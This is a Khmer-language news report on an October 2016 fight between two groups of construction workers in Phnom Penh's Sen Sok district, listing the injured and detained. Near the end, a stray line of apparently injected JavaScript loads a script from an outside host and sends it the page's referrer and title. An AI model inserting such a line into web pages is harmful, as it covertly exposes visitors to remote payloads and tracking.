Leng Navatra – Sidebar Out Left
Leng Navatra – Banner Out Right

កម្មករសំណង់២ក្រុម បើកឆាកប្រយុទ្ធមួយប្រាវ អ្នករបួសចូលពេទ្យ អ្នកឈ្នះដេកគុក!(video)

ភ្នំពេញ៖ កម្មករសំណង់២ក្រុមវាយគ្នាមួយប្រាវ អ្នកខ្លះចូកពេទ្យ រីអ្នកផ្សេងទៀតត្រូវនគរបាលប៉ុស្តិ៍ភ្នំពេញថ្មី ធ្វើការឃាត់ខ្លួនមកសួរនាំ ហេតុការណ៍នេះ កើតឡើងកាលពីវេលាម៉ោង ៨ និង ៣០នាទីយប់ថ្ងៃទី ២៨ តុលា ២០១៦ នៅចំណុចភូមិដំណាក់ សង្កាត់ភ្នំពេញថ្មី ខណ្ឌសែនសុខ រាជធានីភ្នំពេញ។

ភាគីទី ១

ទី១ មានឈ្មោះ មឿន វ៉ៃ ភេទប្រុស អាយុ៣០ឆ្នាំ មុខរបរ កម្មករសំណង់ ស្នាក់នៅក្នុងករដ្ឋានខាងលើ(ឃាត់ខ្លួន) ។ ទី២  ឈ្មោះ យ៉ុយ ចំណាន ភេទស្រី អាយុ៣០ ឆ្នាំមុខរបរ កម្មករសំណង់ ស្នាក់នៅក្នុងករដ្ឋានខាងលើ (ឃាត់ខ្លួន) ។ ទី ៣  ឈ្មោះ វ៉ន វុធ ភេទ ប្រុស អាយុ៣៦ឆ្នាំ (ដេកពេទ្យ) ទី ៤ ឈ្មោះ ខៃ មនោរម្យ ភេទប្រុស អាយុ ២៩ ឆ្នាំ (ដេកពេទ្យ) ទី ៥ ឈ្មោះ សួន សឿន ភេទប្រុស អាយុ ៤០ឆ្នាំ (ដេកពេទ្យ) ទី៦ ឈ្មោះ ម៉ៃ គឺម សាន្ត ភេទប្រុស អាយុ ៤០ ឆ្នាំ (ដេកពេទ្យ) ។

ភាគីទី ២

ទី១ ឈ្មោះ សេង ហ៊ាន់ ភេទប្រុស អាយុ៤១ ឆ្នាំ មុខរបរ មេជាងសំណង់ ស្នាក់នៅក្នុងករដ្ឋានខាងលើ (ឃាត់ខ្លួន)។ ទី ២ ឈ្មោះ រឿន រ៉ាញ់ ភេទប្រុស អាយុ ២២ ឆ្នាំ មុខរបរ កម្មករសំណង់ ស្នាក់នៅក្នុងករដ្ឋានខាងលើ (ឃាត់ខ្លួន)។ ទី៣ ឈ្មោះ ហត់ សីហា ភេទប្រុស អាយុ ២២ឆ្នាំ មុខរបរ កម្មករសំណង់ ស្នាក់នៅក្នុងករដ្ឋានខាងលើ (ឃាត់ខ្លួន)។  ចំណែកបក្ខពួកមួយចំនួនទៀតបានរត់គេចខ្លួនអស់។

ប្រភពបានអោយដឹងថា នៅមុនពេលកើតហេតុ ព្រឹកថ្ងៃខែឆ្នាំដដែល ម៉ោងប្រមាណ ៨ ព្រឹកមេជាងសំណង់ម្នាក់បានជេរប្រមាថធ្ងន់ៗទៅលើកម្មករទាំងអស់ក្រោយពេលបាត់ដែកតាយេ ប្រមាណជាង១ពាន់កង តែមិនមានអ្នកណាម្នាក់តបតឡើយ លុះល្ងាចឡើងនៅម៉ោង ២០និង៣០នាទីយប់ កម្មករសំណង់ក្រុមទី១បាននាំគ្នាអង្គុយផឹកស្រាលើគ្រែ និងជជែកគ្នាលេង  ស្រាប់តែភាគីទី២ បាននិយាយផ្លែផ្កាសំដីថាបានលួចយកដែកខាងលើ ក្រោយនិយាយហើយ បានប៉ះសំដីគ្នាទៅវិញទៅមក បង្កអោយកើតជាហិង្សារវាយគ្នា  មានអ្នកខ្លះចូលពេទ្យ អ្នកខ្លះត្រូវសមត្ថកិច្ចឃាត់ខ្លួន និងមួយចំនួនទៀតរត់គេចខ្លួនបាត់ស្រមោល។

បច្ចុប្បន្ន អ្នករងរបួសកំពុងសំរាកព្យាបាលនៅនៅពេទ្យ ព្រះកុសមៈ ចំណែក៥ នាក់ទៀតត្រូវបានឃាត់ខ្លួនបណ្ណោះអាសន្ននៅអធិការដ្ឋាខណ្ឌសែនសុខ។

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More